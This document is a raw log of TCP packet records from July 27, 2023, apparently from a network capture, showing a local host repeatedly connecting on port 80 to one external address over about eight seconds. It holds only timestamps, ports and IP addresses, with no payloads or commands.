Jul 27, 2023 01:34:45.964154959 CEST	50112	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.009275913 CEST	80	50112	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.013082981 CEST	80	50112	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.013199091 CEST	50112	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.131643057 CEST	50112	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.132467985 CEST	50113	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.176409006 CEST	80	50112	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.176589012 CEST	50112	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.176836014 CEST	80	50113	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.177218914 CEST	50113	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.177618027 CEST	50113	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.221805096 CEST	80	50113	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.224967003 CEST	80	50113	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.225069046 CEST	50113	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.335041046 CEST	50113	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.335776091 CEST	50114	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.379652977 CEST	80	50113	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.379682064 CEST	80	50114	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.379803896 CEST	50113	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.379853010 CEST	50114	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.382042885 CEST	50114	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.426007986 CEST	80	50114	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.431843996 CEST	80	50114	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.431948900 CEST	50114	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.547692060 CEST	50114	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.554956913 CEST	50115	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.591732979 CEST	80	50114	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.591854095 CEST	50114	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.599004030 CEST	80	50115	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.599195004 CEST	50115	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.605561018 CEST	50115	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.650042057 CEST	80	50115	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.654166937 CEST	80	50115	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.654237986 CEST	50115	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.766047001 CEST	50115	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.766915083 CEST	50116	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.810231924 CEST	80	50115	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.810317993 CEST	50115	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.811534882 CEST	80	50116	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.811676979 CEST	50116	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.814244032 CEST	50116	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:46.858709097 CEST	80	50116	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.863979101 CEST	80	50116	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:46.865506887 CEST	50116	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.005894899 CEST	50116	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.007855892 CEST	50117	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.050223112 CEST	80	50116	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.050312996 CEST	50116	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.052773952 CEST	80	50117	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.052881002 CEST	50117	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.057096004 CEST	50117	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.101989031 CEST	80	50117	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.106935024 CEST	80	50117	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.107402086 CEST	50117	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.249360085 CEST	50117	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.251358032 CEST	50118	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.294245005 CEST	80	50117	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.294749975 CEST	50117	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.295870066 CEST	80	50118	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.296093941 CEST	50118	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.296966076 CEST	50118	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.341514111 CEST	80	50118	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.346755981 CEST	80	50118	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.347840071 CEST	50118	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.470367908 CEST	50118	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.471101999 CEST	50119	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.514825106 CEST	80	50118	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.514945030 CEST	80	50119	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.515033007 CEST	50118	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.515111923 CEST	50119	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.522744894 CEST	50119	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.566665888 CEST	80	50119	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.571917057 CEST	80	50119	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.572141886 CEST	50119	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.702944040 CEST	50119	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.729041100 CEST	50120	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.747061014 CEST	80	50119	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.747206926 CEST	50119	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.773112059 CEST	80	50120	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.773303986 CEST	50120	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.773786068 CEST	50120	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.817599058 CEST	80	50120	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.821703911 CEST	80	50120	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.822434902 CEST	50120	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.938913107 CEST	50120	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.939615011 CEST	50121	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.983011961 CEST	80	50120	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.983172894 CEST	50120	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:47.984188080 CEST	80	50121	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:47.985835075 CEST	50121	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.000956059 CEST	50121	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.045793056 CEST	80	50121	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.049355984 CEST	80	50121	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.051734924 CEST	50121	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.172468901 CEST	50121	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.173187017 CEST	50122	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.217294931 CEST	80	50121	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.217904091 CEST	80	50122	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.218020916 CEST	50121	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.218070030 CEST	50122	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.219430923 CEST	50122	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.264298916 CEST	80	50122	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.268186092 CEST	80	50122	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.268321991 CEST	50122	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.375751019 CEST	50122	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.376971960 CEST	50123	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.420725107 CEST	80	50122	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.420846939 CEST	50122	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.421355009 CEST	80	50123	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.421504974 CEST	50123	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.425925970 CEST	50123	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.470494986 CEST	80	50123	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.473753929 CEST	80	50123	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.473866940 CEST	50123	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.578947067 CEST	50123	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.579862118 CEST	50124	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.623389006 CEST	80	50123	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.623694897 CEST	50123	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.623807907 CEST	80	50124	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.624104023 CEST	50124	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.627976894 CEST	50124	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.672081947 CEST	80	50124	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.677004099 CEST	80	50124	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.679378986 CEST	50124	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.785995007 CEST	50124	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.786998987 CEST	50125	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.830198050 CEST	80	50124	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.830305099 CEST	50124	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.831748009 CEST	80	50125	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.831918001 CEST	50125	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.832353115 CEST	50125	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:48.877059937 CEST	80	50125	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.881613970 CEST	80	50125	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:48.881705046 CEST	50125	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.007925987 CEST	50125	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.009109020 CEST	50126	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.052948952 CEST	80	50125	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.053072929 CEST	50125	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.053339005 CEST	80	50126	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.053463936 CEST	50126	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.059067011 CEST	50126	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.103538990 CEST	80	50126	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.106508017 CEST	80	50126	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.106590033 CEST	50126	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.241236925 CEST	50126	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.242211103 CEST	50127	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.286024094 CEST	80	50126	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.286190987 CEST	50126	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.286879063 CEST	80	50127	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.287028074 CEST	50127	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.287487030 CEST	50127	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.332668066 CEST	80	50127	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.336534023 CEST	80	50127	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.336647987 CEST	50127	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.454180956 CEST	50127	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.454896927 CEST	50128	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.500256062 CEST	80	50127	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.500392914 CEST	50127	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.501004934 CEST	80	50128	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.501135111 CEST	50128	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.503904104 CEST	50128	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.551764011 CEST	80	50128	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.554824114 CEST	80	50128	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.554944038 CEST	50128	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.657855988 CEST	50128	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.659807920 CEST	50129	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.703871965 CEST	80	50128	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.704010010 CEST	50128	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.705565929 CEST	80	50129	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.705666065 CEST	50129	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.706510067 CEST	50129	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.752413988 CEST	80	50129	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.756999016 CEST	80	50129	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.757110119 CEST	50129	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.899127960 CEST	50129	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.900026083 CEST	50130	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.946623087 CEST	80	50129	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.946716070 CEST	50129	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.946778059 CEST	80	50130	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.946880102 CEST	50130	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.947475910 CEST	50130	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:49.994016886 CEST	80	50130	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.998178959 CEST	80	50130	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:49.998332977 CEST	50130	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.130805969 CEST	50130	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.131608009 CEST	50131	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.177567959 CEST	80	50130	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.177706003 CEST	50130	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.177736998 CEST	80	50131	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.177844048 CEST	50131	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.178335905 CEST	50131	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.224842072 CEST	80	50131	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.228811979 CEST	80	50131	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.228914976 CEST	50131	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.347254038 CEST	50131	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.348138094 CEST	50132	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.393835068 CEST	80	50131	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.394006968 CEST	50131	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.394510031 CEST	80	50132	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.394648075 CEST	50132	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.395090103 CEST	50132	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.441375017 CEST	80	50132	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.446196079 CEST	80	50132	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.446330070 CEST	50132	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.599138021 CEST	50132	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.600210905 CEST	50133	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.644814968 CEST	80	50132	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.644951105 CEST	50132	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.646778107 CEST	80	50133	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.646878958 CEST	50133	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.647449970 CEST	50133	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.692609072 CEST	80	50133	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.696002960 CEST	80	50133	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.696161032 CEST	50133	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.822590113 CEST	50133	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.823584080 CEST	50134	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.868057013 CEST	80	50133	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.868266106 CEST	50133	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.868891001 CEST	80	50134	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.869009972 CEST	50134	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.873410940 CEST	50134	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:50.919337034 CEST	80	50134	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.923310995 CEST	80	50134	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:50.923391104 CEST	50134	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.035471916 CEST	50134	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.036591053 CEST	50135	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.080761909 CEST	80	50135	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.080782890 CEST	80	50134	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.080859900 CEST	50135	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.080908060 CEST	50134	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.082232952 CEST	50135	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.126539946 CEST	80	50135	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.130455971 CEST	80	50135	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.130650997 CEST	50135	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.307177067 CEST	50135	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.307984114 CEST	50136	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.351620913 CEST	80	50135	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.351711035 CEST	50135	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.352055073 CEST	80	50136	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.352154016 CEST	50136	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.354424000 CEST	50136	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.399060965 CEST	80	50136	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.403455019 CEST	80	50136	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.403527021 CEST	50136	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.517294884 CEST	50136	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.518165112 CEST	50137	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.562154055 CEST	80	50136	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.562249899 CEST	50136	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.563945055 CEST	80	50137	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.564085960 CEST	50137	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.597661972 CEST	50137	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.643146992 CEST	80	50137	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.647535086 CEST	80	50137	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.648308992 CEST	50137	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.770355940 CEST	50137	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.772425890 CEST	50138	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.816283941 CEST	80	50137	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.817662001 CEST	80	50138	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.817823887 CEST	50137	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.817892075 CEST	50138	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.834079981 CEST	50138	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:51.879154921 CEST	80	50138	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.884145021 CEST	80	50138	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:51.884334087 CEST	50138	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.002082109 CEST	50138	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.002964020 CEST	50139	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.047604084 CEST	80	50138	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.047923088 CEST	50138	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.048796892 CEST	80	50139	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.049005985 CEST	50139	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.049530029 CEST	50139	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.095415115 CEST	80	50139	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.099436998 CEST	80	50139	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.099515915 CEST	50139	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.212471962 CEST	50139	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.213370085 CEST	50140	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.258882999 CEST	80	50139	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.258990049 CEST	50139	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.259115934 CEST	80	50140	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.259211063 CEST	50140	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.261368990 CEST	50140	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.307159901 CEST	80	50140	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.311234951 CEST	80	50140	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.311397076 CEST	50140	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.425440073 CEST	50140	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.426363945 CEST	50141	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.471247911 CEST	80	50140	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.472732067 CEST	80	50141	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.472935915 CEST	50140	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.473242044 CEST	50141	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.495157957 CEST	50141	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.541162968 CEST	80	50141	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.545072079 CEST	80	50141	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.546148062 CEST	50141	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.661629915 CEST	50141	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.662893057 CEST	50142	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.707734108 CEST	80	50141	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.708189011 CEST	50141	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.708956957 CEST	80	50142	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.709075928 CEST	50142	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.709477901 CEST	50142	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.755233049 CEST	80	50142	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.760139942 CEST	80	50142	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.760227919 CEST	50142	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.877156973 CEST	50142	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.887320042 CEST	50143	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.924062014 CEST	80	50142	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.924217939 CEST	50142	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.933490038 CEST	80	50143	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.933660984 CEST	50143	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.934412956 CEST	50143	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:52.980463982 CEST	80	50143	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.983932972 CEST	80	50143	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:52.984008074 CEST	50143	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.118175030 CEST	50143	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.119056940 CEST	50144	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.163763046 CEST	80	50143	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.163804054 CEST	80	50144	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.163872957 CEST	50143	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.163924932 CEST	50144	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.164609909 CEST	50144	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.208965063 CEST	80	50144	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.213706017 CEST	80	50144	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.213884115 CEST	50144	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.366755009 CEST	50144	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.367666960 CEST	50145	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.412528992 CEST	80	50144	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.412569046 CEST	80	50145	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.412671089 CEST	50144	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.412700891 CEST	50145	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.413341999 CEST	50145	80	192.168.2.5	77.91.68.61
Jul 27, 2023 01:34:53.459777117 CEST	80	50145	77.91.68.61	192.168.2.5
Jul 27, 2023 01:34:53.484539986 CEST	80	50145	77.91.68.61	192.168.2.5
